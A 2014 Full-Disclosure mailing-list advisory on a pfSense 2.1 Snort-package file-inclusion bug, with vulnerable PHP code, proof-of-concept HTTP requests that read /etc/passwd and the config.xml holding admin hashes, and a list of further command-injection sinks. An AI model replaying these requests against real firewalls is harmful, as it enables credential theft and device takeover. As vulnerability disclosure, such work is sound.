'[Full-disclosure] pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE)'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE)
From:       Pichaya Morimoto <pichaya () ieee ! org>
Date:       2014-01-27 15:07:13
Message-ID: CACfHS=WcBUA5u_RERdT2uEeS0KHBUtLZVX1o+M5OLbJMFtwqZw () mail ! gmail ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]


######################################################################
#  _     ___  _   _  ____  ____    _  _____
#  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
#  | |  | | | |  \| | |  _| |     / _ \ | |
#  | |__| |_| | |\  | |_| | |___ / ___ \| |
#  |_____\___/|_| \_|\____|\____/_/   \_\_|
#
# Exploit Title: pfSense 2.1 Privilege Escalation from less privileged
users (LFI/RCE)
# Date: 25/01/2014 (0-day)
# Exploit Author: @u0x (Pichaya Morimoto)
# Software Link: www.pfsense.org
# Category: Local File Inclusion (LFI) & Privilege Escalation
# Version: pfSense 2.1 build 20130911-1816 with snort 2.9.5.5 pkg v.3.0.2
#
#####################################################################



pfSense firewall/router distribution description :

======================================================================

pfSense is a free, open source customized distribution of FreeBSD tailored
for use as a firewall and router. In addition to being a powerful, flexible
firewalling and routing platform, it includes a long list of related
features and a package system allowing further expandability without adding
bloat and potential security vulnerabilities to the base distribution.
pfSense is a popular project with more than 1 million downloads since its
inception, and proven in countless installations ranging from small home
networks protecting a PC and an Xbox to large corporations, universities
and other organizations protecting thousands of network devices.

This project started in 2004 as a fork of the m0n0wall project, but focused
towards full PC installations rather than the embedded hardware focus of
m0n0wall. pfSense also offers an embedded image for Compact Flash based
installations, however it is not our primary focus.

Attack Scenario

======================================================================

Authenticated users with only permission to access some packages in web gui
(a.k.a. webConfigurator) will be able to escalate themselves to other
privileged admin by reading /conf/config.xml file through bugs (i.e. Snort
LFI), result in fully compromise the pfSense.

This attack abuse the user privilege scheme with some of official packages
(System > Package Manager)

* Session Hijacking also possible to steal less privileged user sessions to
perform this trick  due to "http" admin by default webConfigurator.

Sample bug #1 : Snort Admin Privilege Escalation via Local File Inclusion
Vulnerability

Vulnerable file:

======================================================================

snort_log_view.php

[+] Checksum
SHA1: ec1330e804eb028f2410c8ef9439df103bb2764c
MD5: cd767e46a4e9e09ede7fd26560e37f14

Vulnerable Source Code :
======================================================================
http://www.pfsense.com/packages/config/snort/snort_log_view.php
https://github.com/pfsense/pfsense-packages/blob/master/config/snort/snort_log_view.php

…(deducted)...

$contents = '';
// Read the contents of the argument passed to us.
// Is it a fully qualified path and file?

if (file_exists($_GET['logfile']))
       $contents = file_get_contents($_GET['logfile']);
// It is not something we can display, so print an error.
else
       $contents = gettext("\n\nERROR -- File: {$_GET['logfile']} not
found!");
$pgtitle = array(gettext("Snort"), gettext("Log File Viewer"));
?>

…(deducted)...
<textarea style="width:100%; height:100%;" readonly wrap="off" rows="33"
cols="80" name="code2"><?=$contents;?></textarea>
…(deducted)...



Proof of Concept 1 : Arbitrary File Inclusion
======================================================================

GET /snort/snort_log_view.php?logfile=/etc/passwd HTTP/1.1
Host: firewall1.pentestlab1:1337
Connection: keep-alive
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: th,en-US;q=0.8,en;q=0.6
Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083

HTTP/1.1 200 OK
Expires: Mon, 27 Jan 2014 07:25:10 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=180000
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Last-Modified: Sat, 25 Jan 2014 05:25:10 GMT
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Content-type: text/html
Transfer-Encoding: chunked
Date: Sat, 25 Jan 2014 05:25:10 GMT
Server: lighttpd/1.4.32

…(deducted)...
<td colspan="2" valign="top" class="label">
           <div style="background: #eeeeee; width:100%; height:100%;"
id="textareaitem"><!-- NOTE: The opening *and* the closing textarea tag
must be on the same line. -->
           <textarea style="width:100%; height:100%;" readonly wrap="off"
rows="33" cols="80" name="code2">root:*:0:0:Charlie &:/root:/bin/sh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
…(deducted)...
havp:*:1003:2000:havp daemon:/nonexistent:/sbin/nologin
squid:*:100:100:squid caching-proxy pseudo user:/var/squid:/usr/sbin/nologin
c_icap:*:959:959:c-icap daemon:/var/empty:/usr/sbin/nologin
snortadmin:*:2000:65534:Bill Gates:/home/snortadmin:/sbin/nologin
…(deducted)...

Proof of Concept 2 : Directory Traversal
# This trick works on PHP 5.3.27 with Suhosin-Patch (cgi-fcgi) +
Lighttpd/1.4.32 on FreeBSD 8.3 x64
======================================================================

GET /snort/snort_log_view.php?logfile=../ HTTP/1.1
Host: firewall1.pentestlab1:1337
Connection: keep-alive
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: th,en-US;q=0.8,en;q=0.6
Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083

…(deducted)...
¬p.Z..p firewall_rules_edit.php®p
xmlrpc.php¯p
wizard.php°p
vpn_pptp_users_edit.php±pvpn_pptp_users.php²pvpn_pptp.php³pvpn_pppoe_edit.php´p
vpn_pppoe.phpµp vpn_openvpn_server.php¶pvpn_openvpn_csc.php·p
vpn_openvpn_client.php¸p
vpn_l2tp_users_edit.php¹pvpn_l2tp_users.phpºpvpn_l2tp.php»p
vpn_ipsec_phase2.php¼p vpn_ipsec_phase1.php½p(vpn_ipsec_mobile.php¾p
vpn_ipsec_keys_edit.php¿pvpn_ipsec_keys.phpÀp
vpn_ipsec.phpÁpuploadconfig.php ptreeview.cssÃpwizardsÏp
tree-imagesÛp0$system_usermanager_settings_test.phpÜp8,system_usermanager_settings_ldapacpicker.phpÿÿÿÝp(system_usermanager_settings.phpÞp,!
 …(deducted)...

Proof of Concept 3 : Privilege Escalation
# -rw-r--r--  root wheel 30k Jan 25 11:35 config.xml
======================================================================

GET /snort/snort_log_view.php?logfile=/conf/config.xml HTTP/1.1
Host: firewall1.pentestlab1:1337
Connection: keep-alive
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: th,en-US;q=0.8,en;q=0.6
Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083

…(deducted)...
<group>
           <name>office</name>
           <description><![CDATA[Main Office Employees]]></description>
           <member>2000</member>
           <gid>2000</gid>
       </group>
       <user>
           <name>admin</name>
           <descr><![CDATA[System Administrator]]></descr>
           <scope>system</scope>
           <groupname>admins</groupname>
           <password>$1$y8KiO3ow$mmMX4R0hE…(deducted)...</password>
           <uid>0</uid>
           <priv>user-shell-access</priv>
           <md5-hash>d4383b6f4c9fa…(deducted)...</md5-hash>
<nt-hash>356239666432306265376131653…(deducted)...</nt-hash>
       </user>
…(deducted)...

P.S. There are many other ways to escalate from less-privileged users using
official packages.
For example, some OS command injections (Feel free to dig deeper than me..
LoL)

arping/arping.inc:38:   system("arping -c3 " . $_POST['hostip']);
tinc/tinc.inc:173:                                mwexec("/sbin/ifconfig
{$realif} -group " . $a_ifgroups[$_GET['id']]['ifname']);
spamd/spamd_db_ext.php:57:exec("echo {$_GET['action']} > /tmp/tmp");
spamd/spamd_db.php:106: $status = exec("/usr/local/sbin/spamdb | grep
\"{$_GET['getstatus']}\"");
freeswitch_dev/v_profiles.tmp:38:       exec("cp
".$v_conf_dir.".orig/sip_profiles/".$_GET['f']."
".$v_conf_dir."/sip_profiles/".$_GET['f']);
freeswitch_dev/v_profiles.tmp:60:                       exec("rm
".$v_conf_dir."/sip_profiles/".$_GET['f']);
snort-dev/snortsam-package-code/snort_new.inc:112:
exec("/bin/ln -s
/usr/local/etc/snort/snortDBrules/DB/{$_POST['ruledbname']}/rules
{$pathToSnortDir}/{$newSnortDir}/rules");
snort-dev/snortsam-package-code/snort_new.inc:129:
$sidLinePosPre = exec('/usr/bin/sed -n /sid:' . $_POST['snortSidNum'] .
'\;/= ' . $workingFile);

# Special Thanks : Xelenonz, pistachio, pe3z and 2600 Thailand.
# Video PoC (Thai version) : https://www.youtube.com/watch?v=dGwOUccGZnE


[Attachment #5 (text/html)]

<div dir="ltr"><div>######################################################################<br># \
_     ___  _   _  ____  ____    _  _____<br>#  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|<br>#  \
| |  | | | |  \| | |  _| |     / _ \ | |  <br> #  | |__| |_| | |\  | |_| | |___ / ___ \| |  \
<br>#  |_____\___/|_| \_|\____|\____/_/   \_\_|<br>#<br># Exploit Title: pfSense 2.1 Privilege \
Escalation from less privileged users (LFI/RCE)<br># Date: 25/01/2014 (0-day)<br> # Exploit \
Author: @u0x (Pichaya Morimoto)<br># Software Link: <a \
href="http://www.pfsense.org">www.pfsense.org</a><br># Category: Local File Inclusion (LFI) \
&amp; Privilege Escalation<br># Version: pfSense 2.1 build 20130911-1816 with snort 2.9.5.5 pkg \
v.3.0.2<br> #<br>#####################################################################<br><br><br><br>pfSense \
firewall/router distribution description \
:<br><br>======================================================================<br> <br>pfSense \
is a free, open source customized distribution of FreeBSD tailored for use as a firewall and \
router. In addition to being a powerful, flexible firewalling and routing platform, it includes \
a long list of related features and a package system allowing further expandability without \
adding bloat and potential security vulnerabilities to the base distribution. pfSense is a \
popular project with more than 1 million downloads since its inception, and proven in countless \
installations ranging from small home networks protecting a PC and an Xbox to large \
corporations, universities and other organizations protecting thousands of network devices.<br> \
<br>This project started in 2004 as a fork of the m0n0wall project, but focused towards full PC \
installations rather than the embedded hardware focus of m0n0wall. pfSense also offers an \
embedded image for Compact Flash based installations, however it is not our primary focus.<br> \
<br>Attack Scenario<br><br>======================================================================<br><br>Authenticated \
users with only permission to access some packages in web gui (a.k.a. webConfigurator) will be \
able to escalate themselves to other privileged admin by reading /conf/config.xml file through \
bugs (i.e. Snort LFI), result in fully compromise the pfSense.<br> <br>This attack abuse the \
user privilege scheme with some of official packages (System &gt; Package Manager)<br><br>* \
Session Hijacking also possible to steal less privileged user sessions to perform this trick  \
due to &quot;http&quot; admin by default webConfigurator.<br> <br>Sample bug #1 : Snort Admin \
Privilege Escalation via Local File Inclusion Vulnerability<br><br>Vulnerable \
file:<br><br>======================================================================<br><br>snort_log_view.php<br>
 <br>[+] Checksum<br>SHA1: ec1330e804eb028f2410c8ef9439df103bb2764c<br>MD5: \
cd767e46a4e9e09ede7fd26560e37f14<br><br>Vulnerable Source Code \
:<br>======================================================================<br><a \
href="http://www.pfsense.com/packages/config/snort/snort_log_view.php">http://www.pfsense.com/packages/config/snort/snort_log_view.php</a><br>
 <a href="https://github.com/pfsense/pfsense-packages/blob/master/config/snort/snort_log_view.ph \
p">https://github.com/pfsense/pfsense-packages/blob/master/config/snort/snort_log_view.php</a><br><br>…(deducted)...<br><br>$contents \
= &#39;&#39;;<br> // Read the contents of the argument passed to us.<br>// Is it a fully \
qualified path and file?<br><br>if (file_exists($_GET[&#39;logfile&#39;]))<br>       $contents \
= file_get_contents($_GET[&#39;logfile&#39;]);<br>// It is not something we can display, so \
print an error.<br> else<br>       $contents = gettext(&quot;\n\nERROR -- File: \
{$_GET[&#39;logfile&#39;]} not found!&quot;);<br>$pgtitle = array(gettext(&quot;Snort&quot;), \
gettext(&quot;Log File Viewer&quot;));<br>?&gt;<br><br>…(deducted)...<br> &lt;textarea \
style=&quot;width:100%; height:100%;&quot; readonly wrap=&quot;off&quot; rows=&quot;33&quot; \
cols=&quot;80&quot; name=&quot;code2&quot;&gt;&lt;?=$contents;?&gt;&lt;/textarea&gt;<br>…(deducted)...<br><br><br><br>
 Proof of Concept 1 : Arbitrary File \
Inclusion<br>======================================================================<br><br>GET \
                /snort/snort_log_view.php?logfile=/etc/passwd HTTP/1.1<br>Host: \
                firewall1.pentestlab1:1337<br>
Connection: keep-alive<br>Accept: \
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br>Accept-Encoding: \
gzip,deflate,sdch<br>Accept-Language: th,en-US;q=0.8,en;q=0.6<br>Cookie: \
PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083<br> <br>HTTP/1.1 200 \
OK<br>Expires: Mon, 27 Jan 2014 07:25:10 GMT<br>Expires: Thu, 19 Nov 1981 08:52:00 \
GMT<br>Cache-Control: max-age=180000<br>Cache-Control: no-store, no-cache, must-revalidate, \
                post-check=0, pre-check=0<br>
Last-Modified: Sat, 25 Jan 2014 05:25:10 GMT<br>X-Frame-Options: SAMEORIGIN<br>Pragma: \
no-cache<br>Content-type: text/html<br>Transfer-Encoding: chunked<br>Date: Sat, 25 Jan 2014 \
05:25:10 GMT<br>Server: lighttpd/1.4.32<br> <br>…(deducted)...<br>&lt;td colspan=&quot;2&quot; \
valign=&quot;top&quot; class=&quot;label&quot;&gt;<br>           &lt;div \
style=&quot;background: #eeeeee; width:100%; height:100%;&quot; \
id=&quot;textareaitem&quot;&gt;&lt;!-- NOTE: The opening *and* the closing textarea tag must be \
on the same line. --&gt;<br>  &lt;textarea style=&quot;width:100%; height:100%;&quot; readonly \
wrap=&quot;off&quot; rows=&quot;33&quot; cols=&quot;80&quot; \
name=&quot;code2&quot;&gt;root:*:0:0:Charlie &amp;:/root:/bin/sh<br>toor:*:0:0:Bourne-again \
Superuser:/root:<br> daemon:*:1:1:Owner of many system \
processes:/root:/usr/sbin/nologin<br>operator:*:2:5:System \
&amp;:/:/usr/sbin/nologin<br>…(deducted)...<br>havp:*:1003:2000:havp \
daemon:/nonexistent:/sbin/nologin<br>squid:*:100:100:squid caching-proxy pseudo \
user:/var/squid:/usr/sbin/nologin<br> c_icap:*:959:959:c-icap \
daemon:/var/empty:/usr/sbin/nologin<br>snortadmin:*:2000:65534:Bill \
Gates:/home/snortadmin:/sbin/nologin<br>…(deducted)...<br><br>Proof of Concept 2 : Directory \
Traversal<br># This trick works on PHP 5.3.27 with Suhosin-Patch (cgi-fcgi) + Lighttpd/1.4.32 \
on FreeBSD 8.3 x64<br> \
======================================================================<br><br>GET \
/snort/snort_log_view.php?logfile=../ HTTP/1.1<br>Host: \
firewall1.pentestlab1:1337<br>Connection: keep-alive<br>Accept: \
                text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br>
Accept-Encoding: gzip,deflate,sdch<br>Accept-Language: th,en-US;q=0.8,en;q=0.6<br>Cookie: \
PHPSESSID=980de3bdd73f6bc4728b0dca854de258; \
cookie_test=1390628083<br><br>…(deducted)...<br>¬p.Z..p \
firewall_rules_edit.php®p<br>xmlrpc.php¯p<br> wizard.php°p \
vpn_pptp_users_edit.php±pvpn_pptp_users.php²pvpn_pptp.php³pvpn_pppoe_edit.php´p vpn_pppoe.phpµp \
vpn_openvpn_server.php¶pvpn_openvpn_csc.php·p vpn_openvpn_client.php¸p \
vpn_l2tp_users_edit.php¹pvpn_l2tp_users.phpºpvpn_l2tp.php»p vpn_ipsec_phase2.php¼p \
vpn_ipsec_phase1.php½p(vpn_ipsec_mobile.php¾p vpn_ipsec_keys_edit.php¿pvpn_ipsec_keys.phpÀp \
vpn_ipsec.phpÁpuploadconfig.php ptreeview.cssÃpwizardsÏp<br> \
tree-imagesÛp0$system_usermanager_settings_test.phpÜp8,system_usermanager_settings_ldapacpicker.phpÿÿÿÝp(system_usermanager_settings.phpÞp,!<br>…(deducted)...<br><br>Proof \
of Concept 3 : Privilege Escalation<br># -rw-r--r--  root wheel 30k Jan 25 11:35 config.xml<br> \
======================================================================<br><br>GET \
/snort/snort_log_view.php?logfile=/conf/config.xml HTTP/1.1<br>Host: \
firewall1.pentestlab1:1337<br>Connection: keep-alive<br>Accept: \
                text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br>
Accept-Encoding: gzip,deflate,sdch<br>Accept-Language: th,en-US;q=0.8,en;q=0.6<br>Cookie: \
PHPSESSID=980de3bdd73f6bc4728b0dca854de258; \
cookie_test=1390628083<br><br>…(deducted)...<br>&lt;group&gt;<br>           \
&lt;name&gt;office&lt;/name&gt;<br>  &lt;description&gt;&lt;![CDATA[Main Office \
Employees]]&gt;&lt;/description&gt;<br>           &lt;member&gt;2000&lt;/member&gt;<br>         \
&lt;gid&gt;2000&lt;/gid&gt;<br>       &lt;/group&gt;<br>       &lt;user&gt;<br>  \
&lt;name&gt;admin&lt;/name&gt;<br>           &lt;descr&gt;&lt;![CDATA[System \
Administrator]]&gt;&lt;/descr&gt;<br>           &lt;scope&gt;system&lt;/scope&gt;<br>           \
&lt;groupname&gt;admins&lt;/groupname&gt;<br>  \
&lt;password&gt;$1$y8KiO3ow$mmMX4R0hE…(deducted)...&lt;/password&gt;<br>           \
&lt;uid&gt;0&lt;/uid&gt;<br>           &lt;priv&gt;user-shell-access&lt;/priv&gt;<br>           \
&lt;md5-hash&gt;d4383b6f4c9fa…(deducted)...&lt;/md5-hash&gt;<br> \
&lt;nt-hash&gt;356239666432306265376131653…(deducted)...&lt;/nt-hash&gt;<br>       \
&lt;/user&gt;<br>…(deducted)...<br><br>P.S. There are many other ways to escalate from \
less-privileged users using official packages.<br>For example, some OS command injections (Feel \
free to dig deeper than me.. LoL)<br> <br>arping/arping.inc:38:   system(&quot;arping -c3 \
&quot; . $_POST[&#39;hostip&#39;]);<br>tinc/tinc.inc:173:                                \
mwexec(&quot;/sbin/ifconfig  {$realif} -group &quot; . \
$a_ifgroups[$_GET[&#39;id&#39;]][&#39;ifname&#39;]);<br> \
spamd/spamd_db_ext.php:57:exec(&quot;echo {$_GET[&#39;action&#39;]} &gt; \
/tmp/tmp&quot;);<br>spamd/spamd_db.php:106: $status = exec(&quot;/usr/local/sbin/spamdb | grep \
\&quot;{$_GET[&#39;getstatus&#39;]}\&quot;&quot;);<br> freeswitch_dev/v_profiles.tmp:38:       \
exec(&quot;cp &quot;.$v_conf_dir.&quot;.orig/sip_profiles/&quot;.$_GET[&#39;f&#39;].&quot; \
&quot;.$v_conf_dir.&quot;/sip_profiles/&quot;.$_GET[&#39;f&#39;]);<br>freeswitch_dev/v_profiles.tmp:60: \
exec(&quot;rm &quot;.$v_conf_dir.&quot;/sip_profiles/&quot;.$_GET[&#39;f&#39;]);                \
<br> snort-dev/snortsam-package-code/snort_new.inc:112:                      exec(&quot;/bin/ln \
-s /usr/local/etc/snort/snortDBrules/DB/{$_POST[&#39;ruledbname&#39;]}/rules \
{$pathToSnortDir}/{$newSnortDir}/rules&quot;);<br>snort-dev/snortsam-package-code/snort_new.inc:129: \
$sidLinePosPre = exec(&#39;/usr/bin/sed -n /sid:&#39; . $_POST[&#39;snortSidNum&#39;] . \
&#39;\;/= &#39; . $workingFile);<br> <br># Special Thanks : Xelenonz, pistachio, pe3z and 2600 \
Thailand.<br></div># Video PoC (Thai version) : <a \
href="https://www.youtube.com/watch?v=dGwOUccGZnE">https://www.youtube.com/watch?v=dGwOUccGZnE</a><br></div>




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic